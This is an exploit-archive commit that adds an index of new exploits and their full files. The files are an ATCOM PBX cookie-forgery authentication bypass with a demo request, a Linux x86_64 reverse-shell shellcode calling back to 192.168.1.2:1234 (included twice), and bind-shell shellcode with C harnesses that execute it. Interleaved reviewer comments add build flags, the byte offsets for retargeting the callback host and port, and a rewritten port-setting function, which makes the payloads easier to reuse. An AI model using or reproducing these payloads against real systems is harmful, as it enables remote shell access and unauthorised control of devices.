DB: 2016-06-17

12 new exploits

Linux x86_64 - Reverse Shell Shellcode

Gemalto Sentinel License Manager 18.0.1.55505 - Directory Traversal

Solarwinds Virtualization Manager - Privilege Escalation

Blat 3.2.14 - Stack Overflow

Linux/x86 - Bindshell with Configurable Port - 87 bytes

Linux x86_64 Shellcode Null-Free Reverse TCP Shell

Linux x86 TCP Bind Shell Port 4444 (656 bytes)

Tiki-Wiki CMS Calendar 14.2_ 12.5 LTS_ 9.11 LTS_ and 6.15 - Remote Code Execution

Linux/Windows/BSD x86_64 execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode
ATCOM PBX IP01_ IP08 _ IP4G_ IP2G4A - Authentication Bypass
Roxy Fileman 1.4.4 - Arbitrary File Upload
SlimCMS 0.1 - CSRF (Change Admin Password)
This commit is contained in:
Offensive Security 2016-06-17 05:05:00 +00:00
parent 33dd246d8a
commit 2815f48e25
13 changed files with 1393 additions and 0 deletions


@ -35792,6 +35792,7 @@ id,file,description,date,author,platform,type,port
39575,platforms/php/webapps/39575.txt,"WordPress eBook Download Plugin 1.1 - Directory Traversal",2016-03-21,Wadeek,php,webapps,80
39576,platforms/php/webapps/39576.txt,"WordPress Import CSV Plugin 1.0 - Directory Traversal",2016-03-21,Wadeek,php,webapps,80
39577,platforms/php/webapps/39577.txt,"WordPress Abtest Plugin - Local File Inclusion",2016-03-21,CrashBandicot,php,webapps,80
39578,platforms/lin_x86-64/shellcode/39578.c,"Linux x86_64 - Reverse Shell Shellcode",2016-03-21,"Sudhanshu Chauhan",lin_x86-64,shellcode,0
39579,platforms/windows/local/39579.py,"Internet Download Manager 6.25 Build 14 - 'Find file' Unicode SEH Exploit",2016-03-21,"Rakan Alotaibi",windows,local,0
39580,platforms/php/webapps/39580.txt,"Disc ORGanizer - DORG - Multiple Vulnerabilities",2016-03-21,SECUPENT,php,webapps,80
39581,platforms/hardware/webapps/39581.txt,"D-Link DWR-932 Firmware 4.00 - Authentication Bypass",2016-03-21,"Saeed reza Zamanian",hardware,webapps,80
@ -35882,6 +35883,7 @@ id,file,description,date,author,platform,type,port
39678,platforms/php/webapps/39678.txt,"WPN-XM Serverstack 0.8.6 - Cross Site Request Forgery",2016-04-11,hyp3rlinx,php,webapps,80
39679,platforms/php/webapps/39679.txt,"OpenCart 2.1.0.2 to 2.2.0.0 - json_decode Function Remote Code Execution",2016-04-11,"Naser Farhadi",php,webapps,80
39680,platforms/windows/local/39680.txt,"CAM UnZip 5.1 - Archive Path Traversal",2016-04-11,hyp3rlinx,windows,local,0
39968,platforms/windows/webapps/39968.txt,"Gemalto Sentinel License Manager 18.0.1.55505 - Directory Traversal",2016-06-16,LiquidWorm,windows,webapps,1947
39682,platforms/php/webapps/39682.txt,"RockMongo PHP MongoDB Administrator 1.1.8 - Multiple Vulnerabilities",2016-04-11,"Ozer Goker",php,webapps,80
39683,platforms/hardware/webapps/39683.txt,"Axis Network Cameras - Multiple Vulnerabilities",2016-04-11,Orwelllabs,hardware,webapps,80
39684,platforms/lin_x86-64/shellcode/39684.c,"Linux/x86_64 - bindshell (PORT: 5600) - 81 bytes",2016-04-11,"Ajith Kp",lin_x86-64,shellcode,0
@ -35901,6 +35903,7 @@ id,file,description,date,author,platform,type,port
39700,platforms/lin_x86-64/shellcode/39700.c,"Linux/x86_64 - Read /etc/passwd - 65 bytes",2016-04-15,"Ajith Kp",lin_x86-64,shellcode,0
39701,platforms/cgi/webapps/39701.txt,"AirOS 6.x - Arbitrary File Upload",2016-04-15,93c08539,cgi,webapps,443
39702,platforms/linux/local/39702.rb,"Exim - 'perl_startup' Privilege Escalation",2016-04-15,metasploit,linux,local,0
39967,platforms/linux/local/39967.txt,"Solarwinds Virtualization Manager - Privilege Escalation",2016-06-16,"Nate Kettlewell",linux,local,0
39704,platforms/php/webapps/39704.txt,"WordPress leenk.me Plugin 2.5.0 - CSRF/XSS",2016-04-18,cor3sm4sh3r,php,webapps,80
39705,platforms/php/webapps/39705.txt,"WordPress Kento Post View Counter Plugin 2.8 - CSRF/XSS",2016-04-18,cor3sm4sh3r,php,webapps,80
39706,platforms/hardware/dos/39706.txt,"TH692 Outdoor P2P HD Waterproof IP Camera - Hard Coded Credentials",2016-04-18,DLY,hardware,dos,0
@ -35984,6 +35987,7 @@ id,file,description,date,author,platform,type,port
39789,platforms/windows/dos/39789.py,"RPCScan 2.03 - Hostname/IP Field SEH Overwrite PoC",2016-05-09,"Nipun Jaswal",windows,dos,0
39791,platforms/multiple/local/39791.rb,"ImageMagick <= 6.9.3-9 / <= 7.0.1-0 - Delegate Arbitrary Command Execution (ImageTragick)",2016-05-09,metasploit,multiple,local,0
39792,platforms/ruby/remote/39792.rb,"Ruby on Rails Development Web Console (v2) Code Execution",2016-05-09,metasploit,ruby,remote,3000
39966,platforms/windows/dos/39966.txt,"Blat 3.2.14 - Stack Overflow",2016-06-16,Vishnu,windows,dos,0
39794,platforms/windows/shellcode/39794.c,"All Windows Null-Free Shellcode - Functional Keylogger to File - 601 (0x0259) bytes",2016-05-10,Fugu,windows,shellcode,0
39795,platforms/windows/dos/39795.pl,"MediaInfo 0.7.61 - Crash PoC",2016-05-10,"Mohammad Reza Espargham",windows,dos,0
39796,platforms/windows/dos/39796.py,"Ipswitch WS_FTP LE 12.3 - Search field SEH Overwrite POC",2016-05-10,"Zahid Adeel",windows,dos,0
@ -36004,6 +36008,7 @@ id,file,description,date,author,platform,type,port
39812,platforms/multiple/dos/39812.txt,"Wireshark - AirPDcapDecryptWPABroadcastKey Heap-Based Out-of-Bounds Read",2016-05-13,"Google Security Research",multiple,dos,0
39813,platforms/php/webapps/39813.txt,"CakePHP Framework 3.2.4 - IP Spoofing",2016-05-16,"Dawid Golunski",php,webapps,80
39814,platforms/windows/local/39814.txt,"Multiples Nexon Games - Unquoted Path Privilege Escalation",2016-05-16,"Cyril Vallicari",windows,local,0
39815,platforms/lin_x86/shellcode/39815.c,"Linux/x86 - Bindshell with Configurable Port - 87 bytes",2016-05-16,JollyFrogs,lin_x86,shellcode,0
39816,platforms/php/webapps/39816.php,"eXtplorer 2.1.9 - Archive Path Traversal",2016-05-16,hyp3rlinx,php,webapps,0
39817,platforms/php/webapps/39817.php,"Web interface for DNSmasq / Mikrotik - SQL Injection",2016-05-16,hyp3rlinx,php,webapps,0
39819,platforms/windows/dos/39819.txt,"Microsoft Excel 2010 - Crash PoC",2016-05-16,HauntIT,windows,dos,0
@ -36030,12 +36035,14 @@ id,file,description,date,author,platform,type,port
39841,platforms/xml/webapps/39841.txt,"SAP NetWeaver AS JAVA 7.1 - 7.5 - Information Disclosure",2016-05-19,ERPScan,xml,webapps,0
39842,platforms/linux/dos/39842.txt,"4digits 1.1.4 - Local Buffer Overflow",2016-05-19,N_A,linux,dos,0
39843,platforms/windows/local/39843.c,"VirIT Explorer Lite & Pro 8.1.68 - Local Privilege Escalation",2016-05-19,"Paolo Stagno",windows,local,0
39844,platforms/lin_x86-64/shellcode/39844.c,"Linux x86_64 Shellcode Null-Free Reverse TCP Shell",2016-05-20,"Sudhanshu Chauhan",lin_x86-64,shellcode,0
39845,platforms/windows/local/39845.txt,"Operation Technology ETAP 14.1.0 - Local Privilege Escalation",2016-05-23,LiquidWorm,windows,local,0
39846,platforms/windows/dos/39846.txt,"Operation Technology ETAP 14.1.0 - Multiple Stack Buffer Overrun Vulnerabilities",2016-05-23,LiquidWorm,windows,dos,0
39847,platforms/lin_x86-64/shellcode/39847.c,"Linux x86_64 Information Stealer Shellcode",2016-05-23,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
39848,platforms/php/webapps/39848.py,"Job Script by Scubez - Remote Code Execution",2016-05-23,"Bikramaditya Guha",php,webapps,80
39849,platforms/php/webapps/39849.txt,"XenAPI 1.4.1 for XenForo - Multiple SQL Injections",2016-05-23,"Julien Ahrens",php,webapps,443
39850,platforms/asp/webapps/39850.txt,"AfterLogic WebMail Pro ASP.NET 6.2.6 - Administrator Account Disclosure via XXE Injection",2016-05-24,"Mehmet Ince",asp,webapps,80
39851,platforms/lin_x86/shellcode/39851.c,"Linux x86 TCP Bind Shell Port 4444 (656 bytes)",2016-05-25,"Brandon Dennis",lin_x86,shellcode,0
39852,platforms/java/remote/39852.rb,"Oracle ATS Arbitrary File Upload",2016-05-25,metasploit,java,remote,8088
39853,platforms/unix/remote/39853.rb,"Ubiquiti airOS Arbitrary File Upload",2016-05-25,metasploit,unix,remote,443
39854,platforms/java/remote/39854.txt,"PowerFolder Server 10.4.321 - Remote Code Execution",2016-05-25,"Hans-Martin Muench",java,remote,0
@ -36060,11 +36067,13 @@ id,file,description,date,author,platform,type,port
39875,platforms/linux/dos/39875.py,"TCPDump 4.5.1 - Crash PoC",2016-05-31,"David Silveiro",linux,dos,0
39876,platforms/php/webapps/39876.txt,"AjaxExplorer 1.10.3.2 - Multiple Vulnerabilities",2016-06-01,hyp3rlinx,php,webapps,80
39877,platforms/multiple/dos/39877.txt,"Wireshark - erf_meta_read_tag SIGSEGV",2016-06-01,"Google Security Research",multiple,dos,0
39965,platforms/php/webapps/39965.txt,"Tiki-Wiki CMS Calendar 14.2_ 12.5 LTS_ 9.11 LTS_ and 6.15 - Remote Code Execution",2016-06-16,"Dany Ouellet",php,webapps,80
39879,platforms/php/webapps/39879.txt,"Joomla SecurityCheck Extension 2.8.9 - Multiple Vulnerabilities",2016-06-02,"ADEO Security",php,webapps,80
39880,platforms/jsp/webapps/39880.txt,"Liferay CE < 6.2 CE GA6 - Stored XSS",2016-06-02,"Fernando Câmara",jsp,webapps,0
39881,platforms/php/webapps/39881.txt,"Relay Ajax Directory Manager relayb01-071706_ 1.5.1_ 1.5.3 - Unauthenticated File Upload",2016-06-02,"RedTeam Pentesting GmbH",php,webapps,80
39882,platforms/multiple/dos/39882.txt,"Websockify (C Implementation) 0.8.0 - Buffer Overflow",2016-06-02,"RedTeam Pentesting GmbH",multiple,dos,0
39884,platforms/php/webapps/39884.html,"Dream Gallery 1.0 - CSRF Add Admin Exploit",2016-06-06,"Ali Ghanbari",php,webapps,80
39885,platforms/multiple/shellcode/39885.c,"Linux/Windows/BSD x86_64 execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode",2016-06-06,odzhancode,multiple,shellcode,0
39886,platforms/java/webapps/39886.txt,"Apache Continuum 1.4.2 - Multiple Vulnerabilities",2016-06-06,"David Shanahan",java,webapps,0
39887,platforms/cgi/webapps/39887.txt,"Sun Secure Global Desktop and Oracle Global Desktop 4.61.915 - ShellShock Exploit",2016-06-06,lastc0de,cgi,webapps,80
39888,platforms/windows/local/39888.txt,"Valve Steam 3.42.16.13 - Local Privilege Escalation",2016-06-06,gsX,windows,local,0
@ -36139,3 +36148,6 @@ id,file,description,date,author,platform,type,port
39959,platforms/windows/dos/39959.txt,"Windows 7 - win32k Bitmap Use-After-Free (MS16-062) (1)",2016-06-15,"Nils Sommer",windows,dos,0
39960,platforms/windows/dos/39960.txt,"Windows 7 - win32k Bitmap Use-After-Free (MS16-062) (2)",2016-06-15,"Nils Sommer",windows,dos,0
39961,platforms/linux/dos/39961.txt,"Google Chrome - GPU Process MailboxManagerImpl Double-Read",2016-06-15,"Google Security Research",linux,dos,0
39962,platforms/hardware/webapps/39962.txt,"ATCOM PBX IP01_ IP08 _ IP4G_ IP2G4A - Authentication Bypass",2016-06-16,i-Hmx,hardware,webapps,80
39963,platforms/php/webapps/39963.txt,"Roxy Fileman 1.4.4 - Arbitrary File Upload",2016-06-16,"Tyrell Sassen",php,webapps,80
39964,platforms/php/webapps/39964.html,"SlimCMS 0.1 - CSRF (Change Admin Password)",2016-06-16,"Avinash Thapa",php,webapps,80



@ -0,0 +1,45 @@
# Title: ATCOM PBX system , auth bypass exploit
# Author: i-Hmx
# contact : n0p1337@gmail.com
# Home : sec4ever.com
# Tested on : ATCOM IP01 , IP08 , IP4G and ip2G4A
Details
The mentioned system is affected by auth bypass flaw that allow an attacker to get admin access on the vulnerable machine without perior access
The security check is really stupid , depend on js
affected lines
js/util.js
function alertWithoutLogin(){
var username = getCookie("username");
//alert(username);
if(!!!username){
alert('Sorry, permission denied. Please login first!');
}
}
so actually it just check if username value exist in cookies
and if not , redirect to login.html
just like that!!!!!!!!!!!!!
exploitation?!
just from browser , press f12 , open console
type document.cookie="username=admin"
or from burp intercept proxy and set the cookies as well
go to ip/admin/index.html
and you are in , simple like that :/
Demo request
GET /admin/index.html HTTP/1.1
Host: 192.168.44.12
User-Agent: Mozilla/1.0 (Windows NT 3.3; WOW32; rv:60.0) Gecko/20010101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: username=admin
Connection: close
Upgrade-Insecure-Requests: 1
From Eg-R1z with love
./Faris
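Review bot: The demo request only fetches /admin/index.html, a static page, and no response is shown, so the write-up never demonstrates that the server-side handlers behind the admin UI accept the forged `username=admin` cookie rather than merely serving the HTML shell. The quoted alertWithoutLogin() in js/util.js only raises an alert; the claimed redirect to login.html is not in the snippet, so the sentence "and if not , redirect to login.html" should either quote the redirecting code or be dropped. The User-Agent in the demo (Firefox 60 on "Windows NT 3.3", Gecko/20010101) is not a real browser signature, which suggests the request was hand-written rather than captured; a captured request/response pair against whichever backend call the admin page issues would make the impact claim verifiable. A remediation line is also missing: validate a server-side session on every /admin/ resource and backend endpoint instead of checking cookie presence in JavaScript.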


@ -0,0 +1,84 @@
/*
# Exploit Title: Shellcode [Linux x86_64 Reverse Shell]
# Date: 19/03/2016
# Shellcode Author: Sudhanshu Chauhan
# LinkedIn: https://in.linkedin.com/in/sudhanshuchauhan
# Tested on: [Ubuntu 14.04.1 x86_64]
global _start
_start:
;Socket
xor rax, rax
xor rdi, rdi
xor rsi, rsi
xor rdx, rdx
add rax, 41
add rdi, 2
add rsi, 1
syscall
; copy socket descriptor
mov rdi, rax
; Socket details IP- 192.168.1.2 Port- 1234
xor rax, rax
push rax
mov dword [rsp-4], 0x0201a8c0
mov word [rsp-6], 0xd204
sub rsp, 6
push word 0x2
;connect
xor rax, rax
xor rdx, rdx
add rax, 42
mov rsi, rsp
add rdx, 16
syscall
;duplicate sockets
xor rax, rax
add rax, 33
xor rsi, rsi
syscall
mov al, 33
add rsi, 1
syscall
mov al, 33
add rsi, 1
syscall
; execve
xor rax, rax
push rax
mov rbx, 0x68732f2f6e69622f
push rbx
mov rdi, rsp
push rax
mov rdx, rsp
push rdi
mov rsi, rsp
add rax, 59
syscall
*/
#include <stdio.h>
#include<string.h>
unsigned char code[] = \
"\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x83\xc0\x29\x48\x83\xc7\x02\x48\x83\xc6\x01\x0f\x05\x48\x89\xc7\x48\x31\xc0\x50\xc7\x44\x24\xfc\xc0\xa8\x01\x02\x66\xc7\x44\x24\xfa\x04\xd2\x48\x83\xec\x06\x66\x6a\x02\x48\x31\xc0\x48\x31\xd2\x48\x83\xc0\x2a\x48\x89\xe6\x48\x83\xc2\x10\x0f\x05\x48\x31\xc0\x48\x83\xc0\x21\x48\x31\xf6\x0f\x05\xb0\x21\x48\x83\xc6\x01\x0f\x05\xb0\x21\x48\x83\xc6\x01\x0f\x05\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05";
main()
{
printf("Shellcode Length: %d\n", (int)sizeof(code)-1);
int (*ret)() = (int(*)())code;
ret();
}
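Review bot: The harness gives no build instructions and declares `main()` with an implied int return, which is not valid C99; with a default toolchain the indirect call into `code[]` is likely to fault under NX, so the header should state `int main(void)` and a build line such as `gcc -fno-stack-protector -z execstack 39578.c -o 39578` (the bindshell entry in this same commit documents exactly that). The callback target is hard-coded and its position in the byte string is undocumented: 192.168.1.2 sits at bytes 37-40 (`c0 a8 01 02`) and port 1234 at bytes 46-47 (`04 d2`, network order), so a comment like `// retarget: patch offsets 37-40 (IPv4) and 46-47 (port, big-endian)` would save anyone reusing it a disassembly. The dup2 sequence reloads only `al` after each syscall and therefore relies on the previous return value leaving rax's upper bytes zero, which holds while dup2 succeeds but not on a negative errno return; acceptable for a PoC, but worth a one-line comment.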


@ -0,0 +1,83 @@
/*
# Exploit Title: Shellcode [Linux x86_64 Reverse Shell]
# Date: 19/03/2016
# Shellcode Author: Sudhanshu Chauhan
# LinkedIn: https://in.linkedin.com/in/sudhanshuchauhan
# Tested on: [Ubuntu 14.04.1 x86_64]
global _start
_start:
;Socket
xor rax, rax
xor rdi, rdi
xor rsi, rsi
xor rdx, rdx
add rax, 41
add rdi, 2
add rsi, 1
syscall
; copy socket descriptor
mov rdi, rax
; Socket details IP- 192.168.1.2 Port- 1234
xor rax, rax
push rax
mov dword [rsp-4], 0x0201a8c0
mov word [rsp-6], 0xd204
sub rsp, 6
push word 0x2
;connect
xor rax, rax
xor rdx, rdx
add rax, 42
mov rsi, rsp
add rdx, 16
syscall
;duplicate sockets
xor rax, rax
add rax, 33
xor rsi, rsi
syscall
mov al, 33
add rsi, 1
syscall
mov al, 33
add rsi, 1
syscall
; execve
xor rax, rax
push rax
mov rbx, 0x68732f2f6e69622f
push rbx
mov rdi, rsp
push rax
mov rdx, rsp
push rdi
mov rsi, rsp
add rax, 59
syscall
*/
#include <stdio.h>
#include<string.h>
unsigned char code[] = \
"\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x83\xc0\x29\x48\x83\xc7\x02\x48\x83\xc6\x01\x0f\x05\x48\x89\xc7\x48\x31\xc0\x50\xc7\x44\x24\xfc\xc0\xa8\x01\x02\x66\xc7\x44\x24\xfa\x04\xd2\x48\x83\xec\x06\x66\x6a\x02\x48\x31\xc0\x48\x31\xd2\x48\x83\xc0\x2a\x48\x89\xe6\x48\x83\xc2\x10\x0f\x05\x48\x31\xc0\x48\x83\xc0\x21\x48\x31\xf6\x0f\x05\xb0\x21\x48\x83\xc6\x01\x0f\x05\xb0\x21\x48\x83\xc6\x01\x0f\x05\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05";
main()
{
printf("Shellcode Length: %d\n", (int)sizeof(code)-1);
int (*ret)() = (int(*)())code;
ret();
}
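Review bot: This file is identical to the 39578.c section above - same title, date, author, assembly and byte string - while its files.csv entry in this commit names it "Linux x86_64 Shellcode Null-Free Reverse TCP Shell" dated 2016-05-20; it appears to be a duplicate submission rather than a distinct payload, which should be confirmed before both IDs are kept. If it stays, the header should say how it relates to 39578 and document the hard-coded callback (192.168.1.2 at bytes 37-40 and port 1234 at bytes 46-47 of `code[]`), e.g. `// retarget: patch offsets 37-40 (IPv4) and 46-47 (port, network order)`. The harness also needs `int main(void)` and a build line with `-z execstack`, without which the indirect call into `code[]` is likely to fault.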


@ -0,0 +1,192 @@
/*===================================================================*/
/*
Filename: bindshell.c
Author: JollyFrogs (LookoutFrog@gmail.com)
License: This work is licensed under a Creative Commons
Attribution-NonCommercial 4.0 International License.
Compile:
gcc -m32 -fno-stack-protector -z execstack bindshell.c -o bindshell
*/
#include <stdio.h>
#include <string.h>
#include <stdbool.h>
unsigned char shellcode[] = \
"\x31\xc0\x50\x40\x50\x5b\x50\x40\x50\xb0\x66\x89\xe1\xcd\x80\x97"
"\x5b\x58\x66\xb8\x15\xb3\x66\x50\x66\x53\x89\xe1\x31\xc0\xb0\x10"
"\x50\x51\x57\xb0\x66\x89\xe1\xcd\x80\x50\x57\xb0\x66\x43\x43\x89"
"\xe1\xcd\x80\xb0\x66\x43\xcd\x80\x93\x87\xcf\x49\xb0\x3f\xcd\x80"
"\x75\xf9\x50\x59\x50\x5a\x50\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f"
"\x62\x69\x6e\x87\xe3\xcd\x80";
static bool shellcode_zerocheck() {
// initialize counter
int i = 0;
// check each byte in shellcode array for hexidecimal zero value, return false if zero found
for(i = 0; i < sizeof(shellcode)-1; i++) {if (shellcode[i] == '\x00') return false;}
// Return true if no zeroes found
return true;
}
static bool shellcode_setport(char *buf, int port) {
// Check if decimal port is valid
if (port<1024 || port>65535) return false;
// The offset of the port is 21, but reduce by 1 since the array counts from 0
int shellcode_port_offset = 20; // (\x15\xb3)
// convert decimal port to hexidecimal
*(short *)(buf+shellcode_port_offset) = port; // (\x15\xb3) - shellcode array counts from 0
// Swap port bytes to accomodate for Little Endian memory structure
char tmp = buf[shellcode_port_offset];
buf[shellcode_port_offset] = buf[shellcode_port_offset+1];
buf[shellcode_port_offset+1] = tmp;
// Check if the hexidecimal port contains zeroes, if it does then show an error
if (shellcode[20] == '\x00' || shellcode[21] == '\x00') {
printf("port HEX contains zeroes\n"); return false;
}
// Return true if all checks passed
return true;
}
main () {
// Port in decimal - should be higher than 1024 and lower than 65536
int port = 1234;
// Basic error checking
if (!shellcode_setport(shellcode, port)) {printf("ERROR: Invalid port\n");return 0;}
if (!shellcode_zerocheck()) {printf("ERROR: Shellcode contains zeroes\n");return 0;}
// Print shellcode length.
printf("Shellcode Length: %d\n", strlen(shellcode));
// Run assembly commands
__asm__ (
// Initialize registers
"movl $0x12345678, %eax\n\t"
"movl $0x12345678, %ebx\n\t"
"movl $0x12345678, %ecx\n\t"
"movl $0x12345678, %edx\n\t"
"movl $0x12345678, %edi\n\t"
"movl $0x12345678, %esi\n\t"
"movl $0x12345678, %ebp\n\t"
// execute shellcode
"jmp shellcode");
}
/* Assembly source of shellcode:
global _start
section .text
_start:
; parameters for SOCKET(2) are placed on the stack in reverse order
; SOCKET(2) Synopsis: int socket(int domain, int type, int protocol);
; Before instruction "int 0x80" the stack should look like:
; 02 00 00 00 01 00 00 00 00 00 00 00
; ^AF_INET ^S_STREAM ^TCP
xor eax, eax ; EAX = 00000000
push eax ; PUSH 00000000 (TCP)
inc eax ; EAX = 00000001
push eax ; PUSH 00000001 (SOCK_STREAM)
pop ebx ; EBX = 00000001 (SOCKETCALL.SOCKET)
push eax ; PUSH 00000001 (SOCK_STREAM)
inc eax ; EAX = 00000002
push eax ; PUSH 00000002 (AF_INET)
; invoke socketcall to create the socket
mov al, 0x66 ; EAX = 00000066 (SOCKETCALL)
mov ecx, esp ; ECX = points to top of stack (0xBFFFF3E4)
int 0x80 ; SYSCALL SOCKETCALL(2)-SOCKET(2)
xchg edi, eax ; store fd in edi
; parameters for BIND(2) are placed on the stack in reverse order
; BIND(2) Synopsis: int bind(int sockfd, const struct sockaddr *addr,socklen_t addrlen);
; Before instruction "int 0x80" the stack should look like:
; 07 00 00 00 xx xx xx xx 10 00 00 00 02 00 b3 15 00 00 00 00
; ^FD ^ ^structlen ^AFNT ^port ^in_addr
; | PTR to ---------------^
pop ebx ; EBX = 00000002 (SOCKETCALL.BIND)
pop eax ; EAX = 00000001
; Note: Stack = 00000000
mov ax, 0xB315 ; EAX = 0000B315 (5555 reversed)
push ax ; PUSH B315 (sockaddr_2)
push bx ; PUSH 0002 (sockaddr_3)
mov ecx, esp ; ECX = ESP (0xBFFFF3E8)
xor eax, eax ; EAX = 00000000
mov al, 0x10 ; EAX = 00000010
push eax ; PUSH 00000010 (len(sockaddr))
push ecx ; PUSH (*ADDR) (ptr to sockaddr)
push edi ; push (FD) (SOCKFD)
; invoke socketcall to bind the socket to IP and port
mov al, 0x66 ; EAX = 00000066 (SOCKETCALL)
mov ecx, esp ; ECX = points to top of stack (0xBFFFF3DC)
int 0x80 ; SYSCALL SOCKETCALL(2)-BIND(2)
; parameters for LISTEN(2) are placed on the stack in reverse order
; LISTEN(2) Synopsis: listen(int sockfd, int backlog)
; Before instruction "int 0x80" the stack should look like:
; 07 00 00 00 00 00 00 00
; ^FD ^Backlog = 0
; Note that EAX = 00000000 due to return code from SOCKETCALL above
push eax ; PUSH 00000000 (Backlog)
push edi ; PUSH (FD) (SOCKFD)
; invoke socketcall to set the socket in listen mode
mov al, 0x66 ; EAX = 00000066 (SOCKETCALL)
inc ebx ; EBX = 00000003
inc ebx ; EBX = 00000004 (SOCKETCALL.LISTEN)
mov ecx, esp ; ECX = points to top of stack (0xBFFFF3D4)
int 0x80 ; SYSCALL SOCKETCALL(2)-LISTEN(2)
; Note: The selected port is opened on the system and listening
; parameters for ACCEPT(2) are placed on the stack in reverse order
; ACCEPT(2) Synopsis: int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);
; Before instruction "int 0x80" the stack should look like:
; 07 00 00 00 00 00 00 00 00 00 00 00
; Note that EAX is set to 0 upon successful execution of SOCKETCALL.LISTEN
; Note that stack at 0xBFFFF3D4 already contains what I need:
; 07 00 00 00 00 00 00 00 00 00 00 00
; invoke socketcall to set the socket to accept connections
mov al, 0x66 ; EAX = 00000066 (SOCKETCALL)
inc ebx ; EBX = 00000005 (SOCKETCALL.ACCEPT)
int 0x80 ; SYSCALL SOCKETCALL(2)-ACCEPT(2)
; use syscal DUP2(2) to copy the stdin(0), stdout(1) and stderr(2)
; DUP2(2) Synopsis: int dup2(int oldfd, int newfd);
xchg eax, ebx ; EBX = CFD, EAX = 00000005
xchg ecx, edi ; ECX = 00000007
; XCHG ECX, EDI saves us having to zero out ecx and then MOV 3
redirect:
dec ecx ; ECX = 00000002 (eventually)
mov al, 0x3f ; DUP2(2) (3 times - ECX=2, ECX=1, ECX=0)
int 0x80 ; SYSCALL DUP2(2) (ECX=2, ECX=1, ECX=0)
jnz redirect ;
; spawn /bin/sh shell
; Note that EAX is set to 00000000 upon last succesful execution of DUP2
push eax ; PUSH 00000000 (NULL byte)
pop ecx ; ECX = 00000000 (EXECVE ARGV)
push eax ; PUSH 00000000 (NULL byte)
pop edx ; EDX = 00000000 (EXECVE ENVP)
; push '/bin//sh, 0' on stack
push eax ; PUSH 00000000 (NULL byte)
mov al, 0xb ; EXECVE(2)
push 0x68732f2f ; "//sh"
push 0x6e69622f ; "/bin"
xchg esp, ebx ; Save a byte by sacrificing unneeded ESP
int 0x80 ; Start /bin/sh in the client socket FD
*/
/*===================================================================*/
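Review bot: shellcode_setport() writes the port through `*(short *)(buf+20)` and then swaps the two bytes, which produces the network-order imm16 that the `mov ax` at offset 20 needs only on a little-endian host, and its NUL check reads the global `shellcode` instead of the `buf` it was handed; writing the two bytes directly removes both problems and the unaligned store. The `port<1024` rejection also excludes legitimate low ports (they merely need root to bind), and the comment "should be higher than 1024" does not match a check that accepts 1024. In main(), `printf("Shellcode Length: %d\n", strlen(shellcode))` passes a size_t to `%d` (use `%zu`), and `main ()` should be `int main(void)`. Whether `jmp shellcode` into .data executes depends on the toolchain and kernel still treating data as executable when the stack is (`-z execstack` / READ_IMPLIES_EXEC), so that caveat belongs next to the Compile line. The rewritten setter below also takes `unsigned char *`, matching the array it is called with.
```c
static bool shellcode_setport(unsigned char *buf, int port) {
    // Any TCP port is valid; ports below 1024 merely need root to bind.
    if (port < 1 || port > 65535) return false;
    // Offsets 20-21 hold the imm16 of "mov ax, <port>"; the later "push ax"
    // stores those same two bytes as sin_port, so they must be in network order.
    buf[20] = (unsigned char)(port >> 8);
    buf[21] = (unsigned char)(port & 0xff);
    // A NUL in either byte would truncate the payload in a string copy.
    if (buf[20] == 0 || buf[21] == 0) {
        printf("port HEX contains zeroes\n");
        return false;
    }
    return true;
}
```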


@ -0,0 +1,278 @@
// Title: Linux X86 Bind TCP:4444 (656 bytes)
// Author: Brandon Dennis
// Contact: bdennis@mail.hodges.edu
// Date: 5/24/2016
// ASM Source: https://github.com/slyth11907/x86-ASM-Linux-Intel/blob/master/Code-Examples/ShellCode/execve-stack-bind.asm
/*
; Filename: execve-stack-bind.asm
; Author: Brandon Dennis
; Date: 5/24/2016
; execve
; execve takes 3 arguments
; 1: filename: EX /bin/bash, 0x0
; 2: arguments for the executable(1st arg should be the filename then 2nd arg should be null or 0x0000)
; 3: envp is used for env settings, we can leave this as null: EX 0x0000
; Python code to get the instruction in HEX of the string reversed to place into the stack
; python -c 'string="//etc/shadow";splitNum=8;print "\nLength: %s" % len(string[::-1]);string=string[::-1].encode("hex"); \
; string=["push 0x"+str(string[i:i+splitNum]) for i in range(0, len(string), splitNum)]; \
; print "Hex List:\n"; print("\n".join(h for h in string))'
; Port: 4444 (\x5c\x11) in shellcode
; ShellCode---
; "\x31\xc0\x50\x66\xb8\x66\x00\x31\xdb\xb3\x01\x6a\x01\x6a\x02\x89\xe1\xcd\x80
; \x89\xc2\x31\xc0\x66\xb8\x66\x00\x31\xdb\xb3\x14\x6a\x04\x54\x6a\x02\x6a\x01
; \x52\x89\xe1\xcd\x80\x31\xc0\x66\xb8\x66\x00\x31\xdb\x53\xb3\x02\x66\x68\x11
; \x5c\x66\x6a\x02\x89\xe1\x6a\x16\x51\x52\x89\xe1\xcd\x80\x31\xc0\x31\xdb\x53
; \x66\xb8\x66\x00\xb3\x04\x52\x89\xe1\xcd\x80\x31\xc0\x31\xdb\x53\x53\x66\xb8
; \x66\x00\xb3\x05\x52\x89\xe1\xcd\x80\x89\xc2\x31\xc0\x31\xc9\xb0\x3f\x89\xd3
; \xcd\x80\x31\xc0\x31\xc9\xb0\x3f\xb1\x01\xcd\x80\x31\xc0\xb0\x3f\xb1\x02\xcd
; \x80\x31\xc0\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f
; \x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
; ShellCode---
; Bytes: 656
